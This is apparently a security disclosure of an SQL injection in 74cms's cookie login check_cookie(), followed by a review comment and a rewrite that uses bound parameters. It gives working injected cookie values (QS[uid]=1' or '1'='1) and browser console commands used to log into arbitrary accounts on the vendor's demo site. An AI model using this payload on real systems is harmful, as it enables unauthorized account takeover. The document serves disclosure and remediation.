### Summary:

Arbitrary user login in the latest version of 骑士CMS (74cms), tested against the official demo site.

### Details:

The latest 骑士CMS release removed the global addslashes handling from `include/common.inc.php`:

```
@@ -17,20 +17,10 @@ session_save_path(QISHI_ROOT_PATH.'data/sessions/'); session_start();\r require_once(QISHI_ROOT_PATH.'data/config.php');\r header("Content-Type:text/html;charset=".QISHI_CHARSET);\r +require_once(QISHI_ROOT_PATH.'include/help.class.php');\r require_once(QISHI_ROOT_PATH.'include/common.fun.php');\r require_once(QISHI_ROOT_PATH.'include/74cms_version.php');\r $QSstarttime=exectime();\r -\r -if (!empty($_GET))\r -{\r -$_GET = addslashes_deep($_GET);\r -}\r -if (!empty($_POST))\r -{\r -$_POST = addslashes_deep($_POST);\r -}\r -$_COOKIE = addslashes_deep($_COOKIE);\r -$_REQUEST = addslashes_deep($_REQUEST);\r date_default_timezone_set("PRC");\r $timestamp = time();\r $online_ip=getip();\r
```

As a result, on older PHP builds with GPC (magic_quotes_gpc) off, and on PHP 5.x, request parameters go straight into SQL statements. Although include/help.class.php adds a new filtering function, it does nothing for SQL statements that are built by ordinary string concatenation. A single quote can therefore be injected through GET, POST or COOKIE values, leading to all kinds of privilege escalation. This report uses arbitrary-account login as the demonstration.

user/user_favorites_job.php calls check_cookie() to validate a cookie-based login:

```
define('IN_QISHI', true);
require_once(dirname(__FILE__).'/../include/common.inc.php');
$act = isset($_REQUEST['act']) ? trim($_REQUEST['act']) : 'add';
require_once (QISHI_ROOT_PATH.'include/mysql.class.php');
$db = new mysql($dbhost,$dbuser,$dbpass,$dbname);
// No session yet, but the QS[] login cookies are present: fall back to cookie login.
if((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
{
    require_once (QISHI_ROOT_PATH.'include/fun_user.php');
    // The raw cookie values are passed straight through to check_cookie().
    if(check_cookie($_COOKIE['QS']['uid'],$_COOKIE['QS']['username'],$_COOKIE['QS']['password']))
    {
        update_user_info($_COOKIE['QS']['uid'],false,false);
        header("Location:".get_member_url($_SESSION['utype']));
    }
    else
    {
        ...snip...
    }
}
```

```
function check_cookie($uid,$name,$pwd){
    global $db;
    // Cookie values are interpolated directly into the SQL string, with no escaping or parameter binding.
    $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE uid='{$uid}' and username='{$name}' and password = '{$pwd}'");
    if($row['num'] > 0)
    {
        return true;
    }else{
        return false;
    }
}
```

check_cookie() builds its SQL from unfiltered cookie values, so we only need to set the cookies to:

```
QS[uid]=1' or '1'='1
QS[username]=testadmin
QS[password]=aa
```

and then visit http://demo.74cms.com/user/user_favorites_job.php to be logged in as the account with uid 1.

While logged out, open http://demo.74cms.com/, press F12 to open Chrome's developer tools, and enter the following in the console:

```
document.cookie="QS[username]=test";
document.cookie="QS[password]=aa";
document.cookie="QS[uid]=1' or '1'='1";
```

![1.png](https://images.seebug.org/upload/201508/03155124d7b5498a28b36c3e42382379355c853c.png)

Visiting http://demo.74cms.com/user/user_favorites_job.php then shows a successful login.

![2.png](https://images.seebug.org/upload/201508/0315513756f4eb0d73ab0ddd90e63d6ac711b23f.png)

Log out, then log in as uid=2:

```
document.cookie="QS[username]=test";
document.cookie="QS[password]=aa";
document.cookie="QS[uid]=2' or '1'='1";
```

![3.png](https://images.seebug.org/upload/201508/0315514909bbb94fa70943add38bbefb2c3e6e61.png)

Visiting http://demo.74cms.com/user/user_favorites_job.php again shows a successful login.

![4.png](https://images.seebug.org/upload/201508/03155156328e3eda7d96b8a2a5cd60019050fcdc.png)

### Proof of vulnerability:

![2.png](https://images.seebug.org/upload/201508/0315513756f4eb0d73ab0ddd90e63d6ac711b23f.png)

![4.png](https://images.seebug.org/upload/201508/03155156328e3eda7d96b8a2a5cd60019050fcdc.png)
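Review bot: in the include/common.inc.php hunk, dropping the addslashes_deep() calls on $_GET, $_POST, $_COOKIE and $_REQUEST while leaving the call sites unchanged removes the only escaping that queries built by string interpolation relied on; check_cookie() still runs `WHERE uid='{$uid}' and username='{$name}' and password = '{$pwd}'` with raw cookie values, and the filter newly required from include/help.class.php does not apply to SQL assembled by concatenation. The removal should be paired with converting those call sites to bound parameters (or explicit per-value escaping), or the global escaping kept in place until that conversion is complete.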
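A hardened replacement for check_cookie() using bound parameters, added here as an example and not code from 74cms; it assumes a mysqli connection is passed in as `$mysqli` (the project's own `$db` wrapper is not used) and that `$table` is the value returned by the application's table('members') helper, never request data:

```php
<?php
// Added example, not 74cms code: check_cookie() rewritten so the cookie
// values never become part of the SQL text.
// Assumptions: $mysqli is an open mysqli connection; $table is the value
// returned by the application's own table('members') helper (never user input).
function check_cookie_safe(mysqli $mysqli, string $table, $uid, string $name, string $pwd): bool
{
    // uid is a numeric key, so reject anything that is not all digits up front.
    // A cookie such as QS[uid]=1' or '1'='1 fails here before any query runs.
    if (!ctype_digit((string)$uid)) {
        return false;
    }
    $uidInt = (int)$uid;

    // Placeholders instead of interpolation: the three values reach MySQL
    // separately from the statement, so a quote inside them cannot alter the WHERE clause.
    $sql = "SELECT COUNT(*) AS num FROM {$table} WHERE uid = ? AND username = ? AND password = ?";
    $stmt = $mysqli->prepare($sql);
    if ($stmt === false) {
        return false;          // fail closed: no login on a broken query
    }
    $stmt->bind_param('iss', $uidInt, $name, $pwd);
    if (!$stmt->execute()) {
        $stmt->close();
        return false;
    }
    $num = 0;
    $stmt->bind_result($num);
    $stmt->fetch();
    $stmt->close();
    return $num > 0;
}
```

With the payload from this report, ctype_digit() rejects the uid and the function returns false without touching the database; with a numeric uid, the query only matches a row whose three columns equal the cookie values exactly.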